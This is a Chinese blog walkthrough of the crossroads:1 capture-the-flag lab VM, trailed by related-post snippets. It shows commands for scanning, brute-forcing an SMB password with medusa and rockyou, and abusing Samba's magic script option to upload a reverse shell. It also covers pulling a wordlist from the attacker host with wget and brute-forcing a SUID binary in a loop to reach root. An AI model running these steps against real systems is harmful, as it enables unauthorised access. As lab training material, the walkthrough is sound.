crossroads:1 靶机

原创 已于 2024-06-05 20:09:57 修改 · 574 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2024-06-05 11:30:47 首次发布

一、外围信息收集

  • 靶机描述

Description

get flags

difficulty: easy

about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.

This works better with VirtualBox rather than VMware

描述

获取旗帜

难度:简单

关于vm:从virtualbox中测试和导出。启用DHCP和嵌套vtx/amdv。您可以通过电子邮件联系我的故障处理或问题。

这在VirtualBox上比在VMware上效果更好

  • 靶机界面

  • 网卡信息

网卡信息

VMnet8

MAC地址

00:0C:29:D2:25:59

二、主动信息收集

  • 主机存活探测(ip地址查看)

sudo arp-scan -I eth0 10.10.1.0/24

确定靶机ip 10.10.1.53

  • 端口扫描 

 sudo nmap 10.10.1.53 -A -p- -sS -sC -T4 
 
 Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-05 16:51 CST
Nmap scan report for bogon (10.10.1.53)
Host is up (0.00086s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
| http-robots.txt: 1 disallowed entry 
|_/crossroads.png
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D2:25:59 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: Host: CROSSROADS

Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: crossroads
|   NetBIOS computer name: CROSSROADS\x00
|   Domain name: \x00
|   FQDN: crossroads
|_  System time: 2024-05-05T03:51:36-05:00
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-05-05T08:51:36
|_  start_date: N/A
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)

TRACEROUTE
HOP RTT     ADDRESS
1   0.86 ms bogon (10.10.1.53)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.76 seconds

发现这个靶机开启了smb服务,可以把这个服务当成文件共享服务

80端口 http服务

  • 网页信息

三、渗透过程

  • 网页目录扫描

dirsearch -u http://10.10.1.53

先做个网页目录扫描

有个robots.txt

查看robots.txt

有个png图片

访问一下

  • 爆破

没有信息了

看看smb

工具:enum4linux

发现共享目录 smbshare 和用户 albert

这里使用美杜莎medusa爆破

medusa -u albert -P /usr/share/wordlist/rockyou.txt -M smbnt -h 10.10.1.53

#用户名 密码 -M指定模块 地址

  • 连接smb

爆破出密码是bradley1

连接一下smb共享服务

smbclient //10.10.1.53/smbshare -U albert

ls查看一下有个smb.conf 文件

把他get到kali上

查看smb.conf

发现在最后会运行一个脚本

但是smb上没有这个脚本

  • 上传shell反弹脚本

我们写一个脚本上去

写一个shell反弹

kali开启监听

put传上去

进入下伪终端

python -c "import pty;pty.spawn('/bin/bash')"

cd ..去到上一级目录

还有一个user.txt文件 看一下

它说flag1/2 得到了一半

还有一个flag

  • 提权

find -perm -u=s -type f 2>/dev/null  #查看具有suid权限的命令

有一个beroot 运行一下 要我们输入root用户的密码回车,我们没有密码

思考刚才那个图片

发现在其下有一个png和网页上的那个名字一样

发现网页上的这个图片和文件里面的这个图片不一样

开启靶机的web服务 8000端口

访问下载图片

文件夹下的这个文件大小要网页上的那个文件大,里面可能藏有东西

这个图片是利用stegoveritas 把数据隐写(隐藏)进去的

看看他有没有隐写的内容

stegoveritas Desktop/crossroads.png

执行完后在本地生成一个results

cd 进去发现有一些文件,使用file查看一下

这里使用file是查看一下这些文件是什么文件类型

找到一个txt的

是一个密码字典

复制一下他到新的文件中

做一个密码爆破

kali开启web服务

python3 -m http.server

下载字典到靶机

为什么传字典到靶机呢?

因为靶机没有开22端口,没办法通过ssh登录

wget http://10.10.1.50/zidian/password.txt

利用循环去爆破./beroot

for i in $(cat password.txt);do echo $i | ./beroot; echo $i;done | grep -v wrong

完后本地多了个rootcreds 打开

su root 登录root

flag2/2已结束

到此结束

VulnHub:crossroads靶机实战
Aukum的博客
07-03 1394
smb+反弹shell+图片隐写+suid提权,拿下vulnhub-crossroads
crossroads_vh解题过程
qq_74263993的博客
02-26 428
magic script选项为魔术脚本,这个选项如果被设置了具体文件名,则Samba将在用户打开和关闭文件后立即运行该文件。将这个图片下载下来并且使用隐写工具stegoveritas将其内容提出。将脚本和密码本都上传到smb服务上,再移动到albert路径下。打开监听,上传脚本,实现连接。访问/crossroads.png发现是章图片,信息中断。发现开启了80,139,445端口外还开启了smb服务。4.将beroot文件下载下来,发现它自带提权功能。在keepers目录下的第一个文件就是一个密码本。
CROSSROADS1靶机复盘
weixin_44681307的博客
07-16 457
我们就想到了刚才跟靶机中拷贝到我们自己电脑上的图片文件,经过尝试,这个图片是利用stegoveritas 把数据隐写进去的,首先我们安装stegoveritas工具,需要用到python。我们发现配置文件里面显示SMB会执行的一个脚本,但是smb里面又没有这个脚本,所以我们可以自己创建一个这样的脚本,然后上传到smb上面来。这里我们发现很多文件,挨个file以下,发现有一个text文件,查看了以下发现是个密码字典,我们把这个密码字典拷贝走。发现只有一个文件,我们get到我们本机上,这是smb的配置文件。
CROSSROADS: 1实战演练
龙狼刺的博客
06-22 433
【代码】CROSSROADS: 1实战演练。
vulnhub-crossroads
weixin_43443135的博客
04-10 544
crossroads 环境 kali:192.168.1.103 靶机192.168.1.107 信息收集 nmap 开放端口及服务 80:apache 139:smba 445:smba enum4linux 发现共享目录 smbshare 和用户 albert dirb 发现 robots.txt 爆破 smb 使用 msf 中的爆破模块进行 smb 爆破(hydra 爆久了会卡不知道为什么) ``` use auxiliary/scanner/smb/smb_login set rhost
HackMyVM:CROSSROADS:1靶场解题过程
你好
02-28 1013
其中1.1是网关地址,所以目标靶机就是1.147。
靶机渗透日记
Anonymous
03-01 3631
IP 端口 访问 80 端口 目录扫描 robots.txt & note.txt 访问 crossroads.png ,是一张图片 访问 SMB smbclient -L 192.168.0.133 访问 smbshare 提示需要密码 对目标上的SMB信息进行枚举 enum4linux 192.168.0.133 -A 爆破 SMB 密码 登录 SMB 服务 smbclient //192.168.0.133/smbshare -U ..
crossroads:一个针对未来可能返回哈佛暑期学生的Web应用程序,其中包含来自过去哈佛暑期学生的有用信息,技巧和建议
05-02
十字路口 CSCI S-71敏捷软件开发小组项目 团队: A队 项目介绍: 一个适用于哈佛未来/潜在/重返夏季学生的Web应用程序,其中包含过去/现在的哈佛夏季学生的有用信息,技巧和建议。 您可以在这里找到我们的项目: : ...
前端项目-crossroads.zip
09-02
1. **路由解析**:crossroads.js允许开发者定义URL模式,并将其与特定的处理函数关联。当URL改变时,crossroads.js会自动解析URL并找到相应的处理函数执行。 2. **灵活性**:由于其设计,crossroads.js不仅适用于...
Rhythm-and-Roads:节奏与道路网站
03-07
1. index.html:这是网站的主页面,包含了HTML结构。 2. styles.css:存放网站的CSS样式规则。 3. scripts.js:存放JavaScript代码,用于处理交互和逻辑。 4. images/:可能包含网站所需的图片资源。 5. audio/:...
forest_roads:美国林务局数据样式表
07-02
shp2pgsql -I -W LATIN1 S_USA.RoadCore_FS.shp forest_roads | psql -d forest_roads -q -U richard shp2pgsql -I -W LATIN1 S_USA.AdministrativeForest/S_USA.AdministrativeForest.shp forest_boundaries | ...
Crossroads Tab by Cream .pdf
09-11
Crossroads Tab by Cream》是一份专为中级进阶吉他手设计的曲谱,它包含了著名乐队Cream演绎的经典摇滚乐曲目《Crossroads》的吉他部分乐谱。这首歌曲在全球吉他爱好者中广受欢迎,尤其对于想要挑战更高级演奏技巧...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8846
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
mamba-ssm-2.2.2-cp310-cp310-win-amd64.whl+安装环境+测试脚本.7z
12-15
编译环境: vs2022 win10 x64 anaconda3+python3.10 torch==2.3.1+cu118 cuda11.8.0+cudnn8.9.7 triton==2.1.0 causal_conv1d==1.4.0 mamba==2.2.2 RTX2070显卡 注意编译的whl是不能用于RTX50显卡的,可以用于RTX20-RTX40系列显卡,安装时候尽量和模块一致
toplus1s_calculator_32040_1765656584703.zip
12-15
toplus1s_calculator_32040_1765656584703.zip
【创新无忧】基于多元宇宙优化算法MVO优化相关向量机RVM实现数据多输入单输出回归预测附matlab代码.zip
12-15
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
基于可靠性评估序贯蒙特卡洛模拟法的配电网可靠性评估研究(Matlab代码实现)
12-15
基于可靠性评估序贯蒙特卡洛模拟法的配电网可靠性评估研究(Matlab代码实现)内容概要:本文围绕“基于可靠性评估序贯蒙特卡洛模拟法的配电网可靠性评估研究”,介绍了利用Matlab代码实现配电网可靠性的仿真分析方法。重点采用序贯蒙特卡洛模拟法对配电网进行长时间段的状态抽样与统计,通过模拟系统元件的故障与修复过程,评估配电网的关键可靠性指标,如系统停电频率、停电持续时间、负荷点可靠性等。该方法能够有效处理复杂网络结构与设备时序特性,提升评估精度,适用于含分布式电源、电动汽车等新型负荷接入的现代配电网。文中提供了完整的Matlab实现代码与案例分析,便于复现和扩展应用。; 适合人群:具备电力系统基础知识和Matlab编程能力的高校研究生、科研人员及电力行业技术人员,尤其适合从事配电网规划、运行与可靠性分析相关工作的人员; 使用场景及目标:①掌握序贯蒙特卡洛模拟法在电力系统可靠性评估中的基本原理与实现流程;②学习如何通过Matlab构建配电网仿真模型并进行状态转移模拟;③应用于含新能源接入的复杂配电网可靠性定量评估与优化设计; 阅读建议:建议结合文中提供的Matlab代码逐段调试运行,理解状态抽样、故障判断、修复逻辑及指标统计的具体实现方式,同时可扩展至不同网络结构或加入更多不确定性因素进行深化研究。
基于控制李雅普诺夫-屏障函数(CLBF)与分布式模型预测控制(DMPC)研究(Matlab代码实现)
12-15
基于控制李雅普诺夫-屏障函数(CLBF)与分布式模型预测控制(DMPC)研究(Matlab代码实现)内容概要:本文介绍了基于控制李雅普诺夫-屏障函数(CLBF)与分布式模型预测控制(DMPC)的电力系统优化控制研究,并提供了相应的Matlab代码实现。该研究聚焦于提升含光热电站电力系统的安全性与稳定性,特别计及N-k安全约束,通过结合CLBF的稳定性保证能力和DMPC的分布式协同优化优势,实现对复杂电力系统的高效、可靠控制。文中还展示了多个相关
基于Spring Boot的流浪宠物救助系统的设计与实现源码.zip
最新发布
12-15
基于Spring Boot的流浪宠物救助系统的设计与实现源码.zip
探索gddkia-impediments-on-roads:Python库的云原生之旅
资源摘要信息:"本资源是一个Python库,全名为gddkia-impediments-on-roads-0.1.tar.gz,从PyPI官网下载。该资源可能与zookeeper、分布式系统、云原生(cloud native)技术相关。由于标签中包含了'zookeeper 分布式 云...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值